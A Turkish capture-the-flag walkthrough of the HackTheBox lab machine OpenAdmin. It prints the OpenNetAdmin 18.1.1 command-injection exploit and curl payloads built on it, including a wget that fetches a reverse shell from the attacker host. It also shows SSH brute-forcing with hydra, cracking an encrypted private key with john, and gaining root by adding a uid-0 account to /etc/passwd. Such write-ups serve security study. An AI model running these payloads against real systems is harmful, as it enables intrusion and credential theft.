| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| OpenAdmin - HTB | Kolay | Linux |  |
Walkthrough
Nmap taraması ile başlayalım.
[*] Scan: 9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 21:59 EDT
Nmap scan report for 10.10.10.171
Host is up (0.25s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/17%OT=22%CT=1%CU=40349%PV=Y%DS=2%DC=T%G=Y%TM=60F38EB
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O
OS:3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 120.51 ms 10.10.16.1
2 326.87 ms 10.10.10.171
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 960.96 seconds
Bunun üzerine 80. port için nikto ve gobuster taramalarını başlattım.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# gobuster dir --url http://10.10.10.171/ --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirb/big.txt --no-error | tee gobuster1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.171/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sql,bash,pcap,rar,conf,sh,php,txt,zip,7z,html,bak,php5,cap
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/07/17 19:59:23 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.171/.htaccess.sql (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.sql (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.bash (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.sh (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd/ (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.php5 (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.html (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.php (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.html (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.rar (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.php5 (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.cap (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.cap (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.bak (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.rar (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.pcap (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.conf (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.php (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.bak (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.txt (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess/ (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.zip (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.7z (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.7z (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.pcap (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.sh (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.txt (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.bash (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.zip (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.conf (Status: 403) [Size: 277]
http://10.10.10.171/artwork/ (Status: 200) [Size: 14461]
http://10.10.10.171/icons/ (Status: 403) [Size: 277]
http://10.10.10.171/index.html (Status: 200) [Size: 10918]
http://10.10.10.171/music/ (Status: 200) [Size: 12554]
http://10.10.10.171/server-status/ (Status: 403) [Size: 277]
http://10.10.10.171/sierra/ (Status: 200) [Size: 43029]gobuster taramaları esnasında http://10.10.10.171/music/ adresinde bir uygulama çalıştığını gördüm ve bu uygulamanın version bilgiside mevcuttu. Bununla alakalı exploit taraması gerçekleştirdim.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# searchsploit opennetadmin
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# cp $(locate php/webapps/47691.sh) .
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# cat 47691.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";whoami;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
www-data
Harika! Bir RCE'miz var. Makinede çalışmakta olduğum klasörde yazma hakkım vardı. Bunun üzerine içeriye bir reverse shell upload ettim.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";wget http://10.10.16.56:1111/reverse4kuday.php;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";ls -al;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
total 132
drwxrwxr-x 10 www-data www-data 4096 Jul 18 00:33 .
drwxr-x--- 7 www-data www-data 4096 Nov 21 2019 ..
-rw-rw-r-- 1 www-data www-data 1970 Jan 3 2018 .htaccess.example
-rw-r--r-- 1 www-data www-data 12288 Jul 17 20:08 .reverse.php.swp
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 config
-rw-rw-r-- 1 www-data www-data 1949 Jan 3 2018 config_dnld.php
-rw-rw-r-- 1 www-data www-data 4160 Jan 3 2018 dcm.php
-rwxr-xr-x 1 www-data www-data 5494 Jul 17 19:43 diohan.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 images
drwxrwxr-x 9 www-data www-data 4096 Jan 3 2018 include
-rw-rw-r-- 1 www-data www-data 1999 Jan 3 2018 index.php
-rw-r--r-- 1 www-data www-data 0 Jul 18 00:31 kuday
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 local
-rw-rw-r-- 1 www-data www-data 4526 Jan 3 2018 login.php
-rw-rw-r-- 1 www-data www-data 1106 Jan 3 2018 logout.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 modules
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 plugins
-rw-r--r-- 1 www-data www-data 1111 Jul 17 08:46 reverse.php
-rw-r--r-- 1 www-data www-data 5493 Jul 18 00:19 reverse4kuday.php
-rw-r--r-- 1 www-data www-data 5495 Jul 17 20:02 rshell.php
-rw-r--r-- 1 www-data www-data 76 Jul 17 19:57 shell.php
-rw-r--r-- 1 www-data www-data 73 Jul 17 19:40 shell.php.1
-rw-r--r-- 1 www-data www-data 76 Jul 17 19:57 shell.php.2
-rw-r--r-- 1 www-data www-data 5493 Jul 17 18:18 supaShell.php
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 winc
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 workspace_plugins
Reverse shell'i tarayıcı üzerinden tetiklediğimde dinleme noktama shell düşmüştü.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.171: inverse host lookup failed: Unknown host
connect to [10.10.16.56] from (UNKNOWN) [10.10.10.171] 43070
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
00:34:10 up 1 day, 3:10, 0 users, load average: 3.43, 4.79, 3.99
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.171 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:3463 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:3463 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:34:63 txqueuelen 1000 (Ethernet)
RX packets 2797350 bytes 376270029 (376.2 MB)
RX errors 0 dropped 863 overruns 0 frame 0
TX packets 2762041 bytes 949913630 (949.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 277881 bytes 20887608 (20.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 277881 bytes 20887608 (20.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0İçeride gezinirken db config dosyası buldum.
?>$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>$ hydra ile ssh bruteforce yaptığım esnada saldırıyı durdurdum ve kullanıcılarla burdaki parlayı denemesini sağladım. Böyle bir kullanıcı tespit ettim.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# hydra -L users -P passwords ssh://10.10.10.171
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-17 21:02:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:2/p:1), ~1 try per task
[DATA] attacking ssh://10.10.10.171:22/
[22][ssh] host: 10.10.10.171 login: jimmy password: n1nj4W4rri0R!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-17 21:02:55
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jul 18 01:13:37 UTC 2021
System load: 0.82 Processes: 244
Usage of /: 53.4% of 7.81GB Users logged in: 0
Memory usage: 49% IP address for ens160: 10.10.10.171
Swap usage: 0%
=> There are 6 zombie processes.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jul 17 20:42:12 2021 from 10.10.14.131
jimmy@openadmin:~$
İçeride bilgi toplama aşamasındayken ilginç bir şey farkettim.
---
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:* 3306 mysql'di ancak 52846 ne olduğu hakkında bir bilgim yoktu. Bunun bir web servisi olduğunu anladım ve www altındaki internal klasöründeki kodları deploy edebileceğini düşündüm.
jimmy@openadmin:/var/www/internal$ ls
total 20
drwxrwxrwx 2 jimmy internal 4096 Nov 23 2019 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
-rwxrwxrwx 1 jimmy internal 3229 Nov 22 2019 index.php
-rwxrwxrwx 1 jimmy internal 185 Nov 23 2019 logout.php
-rwxrwxrwx 1 jimmy internal 339 Nov 23 2019 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Görüldüğü üzere main.php joanna kullanıcısının ssh key'ini ekrana basıyor. Denedim ve başarılı oldum.
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Ancak dosya şifrelenmişti john ile hızlı bir şekilde kırabildim.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# /usr/share/john/ssh2john.py id
id:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# /usr/share/john/ssh2john.py id > ssh2john
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# john ssh2john --wordlist=/usr/share/wordlists/rockyou.txt 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2021-07-17 22:02) 0.2475g/s 3549Kp/s 3549Kc/s 3549KC/sa6_123..*7¡Vamos!
Session completed
Artık bağlantı kurabiliriz.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# ssh [email protected] -i id
Enter passphrase for key 'id':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jul 18 02:15:39 UTC 2021
System load: 1.35 Processes: 238
Usage of /: 53.4% of 7.81GB Users logged in: 1
Memory usage: 49% IP address for ens160: 10.10.10.171
Swap usage: 0%
=> There are 6 zombie processes.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jul 17 21:21:40 2021 from 10.10.14.131
joanna@openadmin:~$
Şimdi ilginç bir şey yapacağız. Ama öncesinde flagimizi alalım.
joanna@openadmin:~$ alias ls="ls -al"
joanna@openadmin:~$ ls
total 44
drwxr-x--- 6 joanna joanna 4096 Jul 17 23:47 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
lrwxrwxrwx 1 joanna joanna 9 Nov 22 2019 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 2019 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 2019 .bashrc
drwx------ 2 joanna joanna 4096 Nov 22 2019 .cache
drwx------ 3 joanna joanna 4096 Nov 22 2019 .gnupg
drwxrwxr-x 3 joanna joanna 4096 Nov 22 2019 .local
-rw------- 1 joanna joanna 170 Jul 17 23:47 nano.save
-rw-r--r-- 1 joanna joanna 807 Nov 22 2019 .profile
drwx------ 2 joanna joanna 4096 Nov 23 2019 .ssh
-rw-rw-r-- 1 joanna joanna 33 Nov 28 2019 user.txt
joanna@openadmin:~$ cat user.txt
c9**********************************
Kullanıcının aşağıda gördüğünüz gibi nano'yu root olarak çalıştırabilme hakkı var.
joanna@openadmin:/home$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
Yetki yükseltmeyi şu şekilde yaptım, root haklarında nano aracıyla /opt/priv'y açtım. Ancak daha sonra nano'nun içindeyken /etc/passwd dosyasını a.masını istedim ve son satırına aşağıdaki eklemeyi yaptımm.
joanna@openadmin:~$ sudo /bin/nano /opt/priv
joanna@openadmin:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
user:$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms/:0:0:root:/root:/bin/bash
Şifre ksımını oluştururken openssl'den yardım aldım.
─(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# openssl passwd -1
Password:
Verifying - Password:
$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms/
joanna@openadmin:~$ su user
Password:
root@openadmin:/home/joanna# id
uid=0(root) gid=0(root) groups=0(root)
root@openadmin:/home/joanna# cd /root
root@openadmin:~# ls
root.txt
root@openadmin:~# cat root.txt
2f9******************************
İlk Yorumu Siz Yapın